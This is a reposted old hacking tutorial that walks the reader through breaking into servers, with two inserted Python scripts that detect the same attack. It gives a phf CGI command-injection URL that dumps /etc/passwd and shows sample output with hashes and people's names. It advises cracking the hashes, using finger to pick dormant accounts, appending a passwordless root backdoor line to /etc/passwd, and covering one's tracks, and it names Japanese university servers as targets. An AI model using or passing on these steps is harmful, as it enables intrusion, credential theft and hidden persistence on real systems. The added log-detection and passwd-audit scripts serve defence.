how to get a shell in 24 hours

Upload: jagmohan-jaggu

Post on 07-Apr-2018


  • 8/6/2019 How to Get a Shell in 24 Hours

    1/3


    ********************************************************************
    Have a shell in 24 hours after reading this, or your money back.
    ********************************************************************

    A Darkfool Text - member of SIN http://www.sinnerz.com
    Infected http://www.infected.org

    I have read many a hacking e-zines, and 'how to hack' documents before. They are ok, interesting etc. but they always show you how to get root through a shell, what people seem to forget is the fact that you have to actually get the password before you can use a shell to an account. You might be lucky and find that l:guest p:guest will work. In this text I will show you how easy hacking is ( on old deformed systems ) and how you can get a shell of some sort in 24 hours after reading this. I am not going to go on to explain how to get root after getting a shell as there are 1000's of texts and C programs which explain this.

    OK, the very first thing you need to do is to have a WWW browser, a telnet program, john the ripper kracker program ( I recommend ) and a good dictionary file.

    WWW Browser - Netrape or MSIE are fine
    Telnet Program - One which lets you set which port you want to connect to
    John The Ripper - Will be at http://www.sinnerz.com/darkfool
    Dictionary File - Found at many hacking web sites. Do a search for one

    Ok, every net user/wanna be hacker will have most of those programs and if ya don't they're really easy to get a hold of.

    OK, now I am going to tell you something about Japan. They make your stereo, they made the bits inside your computer, they made your car, they made everything electronic around you, you have their eyes at the end of your nob, but they are rubbish at one thing, the internet and security. They honestly don't know anything about internet security, I have rooted or got shells on many a Japanese servers. These are my favourite systems to attack because they are soooooo easy. I am also told that Australian servers are very easy too, some Berkeley University machines are very easy to krack too.

    Next thing you got to do is fire up your WWW browser. Go to AltaVista http://www.alta-vista.digital.com if you don't know already this is a search engine which has some very nice advance features.

    Once here in the search field box type this url:ac.jp and press search, this looks for all URL's with ac.jp in. This is academic places in Japan, similar to the US which has .edu instead. You will be presented with a load of web pages which text you probably can't read because its all in some funny language. More importantly is the URL which they point out, for example, www.mo.cs.rekimoko.ac.jp , notice the ac.jp at the end of it.

    Click on the link to the site ( longer server urls are easier to break into BTW ). When the URL appears on the WWW browser box at the top of the screen add this line to the end of it.

    /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

    or

    /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd

    i.e

    http://www.mo.cs.rekimoko.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd


    To all you 313375 out there, yes, I know this is the phf technique and it is virtually dead, but you'll be surprised where you can use this.

    This technique of finding the password file to the system is old, it was first used in November 1996 on the FBI web page by a few hackers. It has been patched up by a lot of servers, so this won't work on www.nasa.gov or most of www.*.com but still works on many University servers outside of EU and US.
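For whoever runs the web server, the request described above is easy to spot in an access log: a hit on the phf script whose Qalias value carries an encoded newline followed by a command. The sketch below is an added example, not part of the original text; it assumes Common Log Format, and the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
PHF_PATHS = {"/cgi-bin/phf", "/cgi/phf"}  # the two paths named in the text

def classify(line):
    """Return None for unrelated lines, else a dict describing the phf hit."""
    m = CLF.match(line)
    if not m:
        return None
    host, when, _method, target, status = m.groups()
    parts = urlsplit(target)
    if parts.path.rstrip("/") not in PHF_PATHS:
        return None
    # parse_qsl percent-decodes, so %0a / %0A becomes a literal newline here.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    injected = [v.split("\n", 1)[1] for v in params.values() if "\n" in v]
    if injected and status == "200":
        verdict = "command-injection-served"   # script exists and answered
    elif injected:
        verdict = "command-injection-refused"  # 403/404: probe only
    else:
        verdict = "phf-access"                 # ordinary use of the script
    return {"host": host, "time": when, "status": int(status),
            "verdict": verdict, "command": injected[0] if injected else None}

def scan(text):
    """Classify every line of a log and keep only the phf-related hits."""
    return [hit for hit in map(classify, text.splitlines()) if hit]

# Constructed sample lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [07/Apr/1998:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 2326
198.51.100.7 - - [07/Apr/1998:10:02:11 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1432
198.51.100.7 - - [07/Apr/1998:10:02:15 +0000] "GET /cgi/phf?Qalias=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 404 210
203.0.113.5 - - [07/Apr/1998:10:05:40 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "command-injection-served" hit means the script ran and the password file should be treated as disclosed; the refused verdicts correspond to the 404 and permission responses the text goes on to describe.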

    Ok, once the URL has been entered you will see a number of things :-

    Error 404
    /cgi-bin/phf is not found on this server

    OR

    WARNING
    You do not have permission to view /cgi-bin/phf/ on this server

    There are a number of other things the server might say, but the thing you want it to say is the following :-

    /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd

    root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
    www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
    kangaroo:3A62i9qr.YmO.:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
    maemae:dvUMqNmeeENFs:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
    watanaby:ewF90K0gwXVD6:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
    kake:kFph8HEM/aaAA:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
    etc.......

    This means you have hit the jackpot !

    If you get something similar to this but all lines have something similar to the following :-

    root:*:0:1:Operator:/:/bin/csh
    www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
    kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
    maemae:*:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
    watanaby:*:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
    kake:*:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh

    ( notice the * ) if you don't know already this means its shadowed and you cannot work out the password using a shadowed file.

    If some but not all of the logins have * in them its ok, its worthwhile getting the ones which aren't shadowed, hey, a shell is a shell !

    Get all the lines which aren't shadowed and then paste them into notepad, write the name of the server in the top line of the file and save it.

    Ok now for the next bit, this is fairly simple but can be a lengthy process depending upon which speed machine you have and how big your password file is and dictionary file. Use john the ripper or whatever password cracker you are using, although I recommend john the ripper because its quick. This will probably take a long time so go to the pub or have a drive or something.......

    If you are lucky enough to work out the passwords to the logins then well done, if you don't, then find another server or increase the size of your dictionary file, make it as big as you can, the bigger the better, the more luck you will have in finding the password.

    OK, you got some passwords to a few logins, if you got root then jump around the room with joy ( I do ). If you didn't then, well, at least you got yourself some shells. Now, if you want to keep these shells without anyone knowing then your best bet is to telnet to the site at port 79, you will have a blank prompt, here type in the username of the account you cracked, it will tell you the last time they logged in, do this for all the accounts, use the account which isn't used very much, the best ones are the ones which say ' User Never Logged On ' because then the account is basically yours !

    { Note: If you get root type the following at the shell prompt :-

    echo "myserver::0:0:Test User:/:/bin/csh" >> \etc\passwd

    This will allow you to login to the server with l:myserver so you don't get admin suspicious when they see people logging in as root. }
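Everything in this section leaves marks in the password file itself: password hashes sitting in a world-readable file instead of a shadow file, and an appended account with an empty password field and UID 0. The audit below is an added example, not part of the original text; the function name, finding labels and sample file are constructed (the alice hash is a made-up string), and only the myserver line is taken from the text.

```python
# Password-field values that mean "no hash stored here".
SHADOWED = {"x"}            # hash lives in the shadow file
LOCK_PREFIXES = ("*", "!")  # locked or disabled account, as in the * listing

def audit_passwd(text):
    """Return (login, finding) tuples for risky entries in passwd-format text."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed"))
            continue
        login, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            # Empty field: the account logs in with no password at all.
            findings.append((login, "empty-password"))
        elif pw not in SHADOWED and not pw.startswith(LOCK_PREFIXES):
            # A hash readable by every local user and every file-disclosure
            # bug is open to offline dictionary guessing.
            findings.append((login, "hash-in-passwd"))
        if uid == "0" and login != "root":
            # A second superuser under another name.
            findings.append((login, "extra-uid0"))
    return findings

# Constructed sample; the last line is the entry quoted in the note above.
SAMPLE_PASSWD = """\
root:x:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
alice:ab01CdEfGhIjK:1012:10:Constructed User:/home/user/alice:/bin/csh
myserver::0:0:Test User:/:/bin/csh
"""

if __name__ == "__main__":
    for login, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{login}: {finding}")
```

Run against a copy of the live file on a schedule and compared with the previous result, any new "empty-password" or "extra-uid0" finding is worth an immediate look.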


    Hide yourself as much as possible, if you already have a shell then go through that first when logging on, or, telnet to the hacked shell and then re-telnet to the hacked shell using the hacked shell, if you see what I mean, so your who appears as localhost. Get some C scripts which delete your presence etc...

    That's it, if there's demand to explain this in further detail then please e-mail me telling me you want a follow up, I don't do personal help so don't e-mail me asking for help PLEASE DON'T !

    That's it.....

    " Stay cool and be somebody's darkfool this year "

    Saying a quick hello to #prophet undernet. Visit me on #sin.
    I am at http://www.sinnerz.com/darkfool

    [email protected] also a lot of Japanese servers ;)

    --
    " Stay Cool and be somebody's Darkfool "
    http://sinnerz.com/darkfool
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-